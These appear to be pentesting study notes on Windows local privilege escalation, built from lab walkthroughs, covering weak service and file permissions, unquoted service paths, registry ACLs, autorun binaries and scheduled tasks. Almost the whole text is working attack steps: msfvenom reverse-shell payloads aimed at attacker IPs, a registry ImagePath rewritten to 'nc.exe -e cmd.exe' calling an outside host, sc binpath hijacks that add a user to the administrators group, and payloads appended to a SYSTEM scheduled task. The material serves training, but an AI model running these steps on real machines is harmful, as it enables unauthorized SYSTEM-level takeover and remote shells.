Weak Permissions

Services Issues

# PowerUp

Get-ServiceUnquoted -Verbose # Unquoted path

Get-ModifiableServiceFile -Verbose # Current user can write to the binary path or change args to the binary

Get-ModifiableService -Verbose # Current user can modify configuration

Permissive File System ACLs

Running SharpUp

GitHub - GhostPack/SharpUp: SharpUp is a C# port of various PowerUp functionality.GitHub

GitHub - r3motecontrol/Ghostpack-CompiledBinaries: Compiled Binaries for Ghostpack (.NET v4.0)GitHub

https://github.com/jakobfriedl/precompiled-binaries/raw/main/Enumeration/SharpUp.exe

PS C:\htb> .\SharpUp.exe audit

=== SharpUp: Running Privilege Escalation Checks ===


=== Modifiable Service Binaries ===

  Name             : SecurityService
  DisplayName      : PC Security Management Service
  Description      : Responsible for managing PC security
  State            : Stopped
  StartMode        : Auto
  PathName         : "C:\Program Files (x86)\PCProtect\SecurityService.exe"
  
  <SNIP>

ACEshark

GitHub - t3l3machus/ACEshark: ACEshark is a utility designed for rapid extraction and analysis of Windows service configurations and Access Control Entries, eliminating the need for tools like accesschk.exe or other non-native binaries.GitHub

Checking Permissions with icacls

icacls usage:
check permissions, set ownership of the folder, set, remove or deny permissions

# Check permissions
PS C:\> icacls C:\folder_name
(...)

I - permission inherited from the parent container
F - full access (full control)
M - Modify right/access
OI - object inherit
IO - inherit only
CI - container inherit
RX - read and execute
AD - append data (add subdirectories)
WD - write data and add files

# Set ownership
PS C:\> icacls C:\folder_name /setowner Username

PS C:\htb> icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe"

C:\Program Files (x86)\PCProtect\SecurityService.exe BUILTIN\Users:(I)(F)
                                                     Everyone:(I)(F)
                                                     NT AUTHORITY\SYSTEM:(I)(F)
                                                     BUILTIN\Administrators:(I)(F)
                                                     APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                                     APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

Successfully processed 1 files; Failed processing 0 files

EVERYONE and BUILTIN\Users groups have been granted full permissions to the directory

Replacing Service Binary

C:\htb> cmd /c copy /Y SecurityService.exe "C:\Program Files (x86)\PCProtect\SecurityService.exe"
C:\htb> sc start SecurityService

Make a backup of the original binary and replace it with a malicious binary generated with msfvenom. It can give us a reverse shell as SYSTEM, or add a local admin user and give us full administrative control over the machine.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.15.76 LPORT=443 -f exe > SecurityService.exe

Weak Service Permissions

C:\htb> SharpUp.exe audit
 
=== SharpUp: Running Privilege Escalation Checks ===
 
 
=== Modifiable Services ===
 
  Name             : WindscribeService
  DisplayName      : WindscribeService
  Description      : Manages the firewall and controls the VPN tunnel
  State            : Running
  StartMode        : Auto
  PathName         : "C:\Program Files (x86)\Windscribe\WindscribeService.exe"

Checking Permissions with AccessChk

C:\htb> accesschk.exe /accepteula -quvcw WindscribeService
 
Accesschk v6.13 - Reports effective permissions for securable objects
Copyright ⌐ 2006-2020 Mark Russinovich
Sysinternals - www.sysinternals.com
 
WindscribeService
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
  RW BUILTIN\Administrators
        SERVICE_ALL_ACCESS
  RW NT AUTHORITY\Authenticated Users
        SERVICE_ALL_ACCESS

All Authenticated Users have SERVICE_ALL_ACCESS rights over the service

Check Local Admin Group

C:\htb> net localgroup administrators

Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain
 
Members
 
-------------------------------------------------------------------------------
Administrator
mrb3n
The command completed successfully.

htb-student is not a member.

Changing the Service Binary Path

C:\htb> sc config WindscribeService binpath="cmd /c net localgroup administrators htb-student /add"

[SC] ChangeServiceConfig SUCCESS

Stopping and Starting Service

C:\htb> sc stop WindscribeService

C:\htb> sc start WindscribeService

[SC] StartService FAILED 1053:
 
The service did not respond to the start or control request in a timely fashion.

The command we placed in the binpath will run even though an error message is returned. The service fails to start because the binpath is not pointing to the actual service executable

Confirming Local Admin Group Addition

C:\htb> net localgroup administrators

Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain
 
Members
 
-------------------------------------------------------------------------------
Administrator
htb-student
mrb3n
The command completed successfully.

Cleanup

C:\htb> sc config WindScribeService binpath="c:\Program Files (x86)\Windscribe\WindscribeService.exe"

C:\htb> sc start WindScribeService

C:\htb> sc query WindScribeService

Other example - Insecure Service Permissions

Before starting exploitation - Create a reverse shell: msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f exe -o reverse.exe - Transfer reverse.exe on the victim machine

Exploitation

1. Use AccessChk to check the user account's permissions on the service. Ex with username 'user' et service 'daclsvc': C:\PrivEsc\accesschk.exe /accepteula -uwcqv user daclsvc
2. Permission to change config files: SERVICE_CHANGE_CONFIG

3. Query the service: sc qc daclsvc

4. If the service runs with SYSTEM privileges (SERVICE_START_NAME)

5. Modify the service config and set the BINARY_PATH_NAME (binpath) to the reverse.exe: sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\""

6. Start a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges: net start daclsvc

Other example - Insecure Service Executables

1. Query the "filepermsvc" service and note that it runs with SYSTEM privileges (SERVICE_START_NAME).: sc qc filepermsvc

2. Using accesschk.exe, note that the service binary (BINARY_PATH_NAME) file is writable by everyone: C:\PrivEsc\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"

3. Copy the reverse.exe executable you created (cf. Insecure Service Permissions - before starting exploitation) and replace the filepermservice.exe with it: copy C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe" /Y

4. Start a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges: net start filepermsvc

Unquoted Service Path

Service Binary Path

C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe

Windows will attempt to load the following potential executables in order on service start, with a .exe being implied:

• C:\Program

• C:\Program Files

• C:\Program Files (x86)\System

• C:\Program Files (x86)\System Explorer\service\SystemExplorerService64

If we can create the following files, we would be able to hijack the service binary and gain command execution in the context of the service, in this case, NT AUTHORITY\SYSTEM.

• C:\Program.exe\

• C:\Program Files (x86)\System.exe

However, creating files in the root of the drive or the program files folder requires administrative privileges.

Searching for Unquoted Service Paths

C:\htb> wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
GVFS.Service                                                                        GVFS.Service                              C:\Program Files\GVFS\GVFS.Service.exe                                                 Auto
System Explorer Service                                                             SystemExplorerHelpService                 C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe             Auto
WindscribeService                                                                   WindscribeService                         C:\Program Files (x86)\Windscribe\WindscribeService.exe                                  Auto

Example - IObitUnSvr

IObit Uninstaller 9.1.0.8 - 'IObitUnSvr' Unquoted Service PathExploit Database

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.2 LPORT=4444 -f exe > IObit.exe

No right to write on path

Get-ServiceAcl.ps1: https://gist.github.com/cube0x0/1cdef7a90473443f72f28df085241175

Import-Module "C:/Users/username/Desktop/Get-ServiceAcl.ps1"
"IObitUnSvr" | Get-ServiceAcl | select -ExpandProperty Access

Rights to change config

sc.exe config IObitUnSvr binPath="cmd.exe /c "C:\Users\username\Desktop\IObit.exe""
sc.exe stop IObitUnSvr
sc.exe start IObitUnSvr

Other example - Unquoted Service Path

1. Query the "unquotedsvc" service and note that it runs with SYSTEM privileges (SERVICE_START_NAME) and that the BINARY_PATH_NAME is unquoted and contains spaces. sc qc unquotedsvc Ex: BINARY_PATH_NAME : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe

2. Using accesschk.exe, note that the BUILTIN\Users group is allowed to write to the C:\Program Files\Unquoted Path Service\ directory: C:\PrivEsc\accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"

3. Copy the reverse.exe (cf. Insecure Service Permissions - before starting exploitation) executable you created to this directory and rename it Common.exe: copy C:\PrivEsc\reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"

4. Start a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges: net start unquotedsvc

Permissive Registry ACLs

Checking for Weak Service ACLs in Registry

C:\htb> accesschk.exe /accepteula "mrb3n" -kvuqsw hklm\System\CurrentControlSet\services

Accesschk v6.13 - Reports effective permissions for securable objects
Copyright ⌐ 2006-2020 Mark Russinovich
Sysinternals - www.sysinternals.com

RW HKLM\System\CurrentControlSet\services\ModelManagerService
        KEY_ALL_ACCESS

<SNIP> 

Changing ImagePath with PowerShell

PS C:\htb> Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\john\Downloads\nc.exe -e cmd.exe 10.10.10.205 443"

Other example - Weak Registry Permissions

1. Query the "regsvc" service and note that it runs with SYSTEM privileges (SERVICE_START_NAME) : sc qc regsvc

2. Using accesschk.exe, note that the registry entry for the regsvc service is writable by the "NT AUTHORITY\INTERACTIVE" group (essentially all logged-on users): C:\PrivEsc\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc

3. Overwrite the ImagePath registry key to point to the reverse.exe executable you created (cf. Insecure Service Permissions - before starting exploitation)

   : reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f

4. Start a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges: net start regsvc

Modifiable Registry Autorun Binary

Check Startup Programs

PS C:\htb> Get-CimInstance Win32_StartupCommand | select Name, command, Location, User |fl

Name     : OneDrive
command  : "C:\Users\mrb3n\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
Location : HKU\S-1-5-21-2374636737-2633833024-1808968233-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
User     : WINLPE-WS01\mrb3n

Name     : Windscribe
command  : "C:\Program Files (x86)\Windscribe\Windscribe.exe" -os_restart
Location : HKU\S-1-5-21-2374636737-2633833024-1808968233-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
User     : WINLPE-WS01\mrb3n

Name     : SecurityHealth
command  : %windir%\system32\SecurityHealthSystray.exe
Location : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
User     : Public

Name     : VMware User Process
command  : "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
Location : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
User     : Public

Name     : VMware VM3DService Process
command  : "C:\WINDOWS\system32\vm3dservice.exe" -u
Location : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
User     : Public

Suppose we have write permissions to the registry for a given binary or can overwrite a binary listed. In that case, we may be able to escalate privileges to another user the next time that the user logs in.

Other example - Registry - AutoRuns

1. Query the registry for AutoRun executables: reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

2. Using accesschk.exe, note that one of the AutoRun executables is writable by everyone: C:\PrivEsc\accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe"

3. Copy the reverse.exe executable you created (cf. Insecure Service Permissions - before starting exploitation) and overwrite the AutoRun executable with it: copy C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe" /Y

4. Start a listener on Kali and then restart the Windows VM. Open up a new RDP session to trigger a reverse shell running with admin privileges. You should not have to authenticate to trigger it, however if the payload does not fire, log in as an admin (admin/password123) to trigger it. Note that in a real world engagement, you would have to wait for an administrator to log in themselves! rdesktop MACHINE_IP

Scheduled Task

View the contents of the C:\DevTools\CleanUp.ps1 script: type C:\DevTools\CleanUp.ps1

The script seems to be running as SYSTEM every minute. Using accesschk.exe, note that you have the ability to write to this file: C:\PrivEsc\accesschk.exe /accepteula -quvw user C:\DevTools\CleanUp.ps1

Start a listener on Kali and then append a line to the C:\DevTools\CleanUp.ps1 which runs the reverse.exe executable you created: echo C:\PrivEsc\reverse.exe >> C:\DevTools\CleanUp.ps1

Wait for the Scheduled Task to run, which should trigger the reverse shell as SYSTEM.

Startup Apps

Writable ? C:\PrivEsc\accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"